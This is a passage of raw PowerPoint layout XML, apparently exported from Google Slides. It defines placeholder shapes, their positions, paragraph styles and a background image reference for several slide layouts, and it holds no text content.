            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057900" y="1073150"/>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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="30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6" name="Google Shape;66;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-323850" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472458" y="4663216"/>
            <a:ext cx="548700" cy="3936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2171700" y="573280"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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514350" y="1645920"/>
            <a:ext cx="8115300" cy="30180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1" name="Google Shape;71;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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514350" y="4766884"/>
            <a:ext cx="58293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572250" y="285750"/>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171700" y="573280"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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6" name="Google Shape;76;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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7" name="Google Shape;77;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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8" name="Google Shape;78;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Google Shape;80;p18" descr="C3-HD-BTM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3281363"/>
            <a:ext cx="9144000" cy="1862138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="565150"/>
            <a:ext cx="8115300" cy="2101500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
              <a:defRPr sz="30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2" name="Google Shape;82;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768350" y="2731294"/>
            <a:ext cx="7867500" cy="717000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buNone/>
              <a:defRPr sz="17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83" name="Google Shape;83;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860839" y="285750"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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4" name="Google Shape;84;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="285751"/>
            <a:ext cx="5243700" cy="2730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5" name="Google Shape;85;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146839" y="285750"/>
            <a:ext cx="4830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2171700" y="573280"/>
            <a:ext cx="6458100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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8" name="Google Shape;88;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645919"/>
            <a:ext cx="4000500" cy="30180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9" name="Google Shape;89;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="1645919"/>
            <a:ext cx="4000500" cy="30180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0" name="Google Shape;90;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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1" name="Google Shape;91;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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2" name="Google Shape;92;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="571500"/>
            <a:ext cx="6458100" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r"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5" name="Google Shape;95;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685807" y="1637851"/>
            <a:ext cx="38100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2100"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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96" name="Google Shape;96;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2349500"/>
            <a:ext cx="3984000" cy="23145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7" name="Google Shape;97;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="1637851"/>
            <a:ext cx="38289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2100"/>
              <a:buNone/>
              <a:defRPr sz="2100" b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>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98" name="Google Shape;98;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629150" y="2349500"/>
            <a:ext cx="4000500" cy="23145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9" name="Google Shape;99;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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0" name="Google Shape;100;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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1" name="Google Shape;101;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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514350" y="4766884"/>
            <a:ext cx="58293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572250" y="285750"/>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514350" y="1143000"/>
            <a:ext cx="30861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entury Gothic"/>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8" name="Google Shape;108;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746687" y="560069"/>
            <a:ext cx="4883100" cy="4104000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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9" name="Google Shape;109;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2343149"/>
            <a:ext cx="3086100" cy="23208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446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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514350" y="4766884"/>
            <a:ext cx="58293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572250" y="285750"/>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514350" y="1143000"/>
            <a:ext cx="51549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entury Gothic"/>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5" name="Google Shape;115;p23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895929" y="563431"/>
            <a:ext cx="2733900" cy="4100700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2343149"/>
            <a:ext cx="5154900" cy="23208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17" name="Google Shape;117;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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8" name="Google Shape;118;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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9" name="Google Shape;119;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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514333" y="3523020"/>
            <a:ext cx="8116500" cy="6144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entury Gothic"/>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2" name="Google Shape;122;p24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511295" y="706079"/>
            <a:ext cx="8116500" cy="2608800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4137536"/>
            <a:ext cx="8115300" cy="5265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24" name="Google Shape;124;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6446520" y="4767263"/>
            <a:ext cx="2183100" cy="273900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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5" name="Google Shape;125;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="4766884"/>
            <a:ext cx="58293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6" name="Google Shape;126;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="285750"/>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127"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="128" name="Google Shape;128;p25" descr="C3-HD-BTM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3281363"/>
            <a:ext cx="9144000" cy="1862138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Google Shape;129;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="565149"/>
            <a:ext cx="8115300" cy="21021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2400"/>
              <a:buFont typeface="Century Gothic"/>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0" name="Google Shape;130;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768350" y="2736850"/>
            <a:ext cx="7597800" cy="749400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr"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31" name="Google Shape;131;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
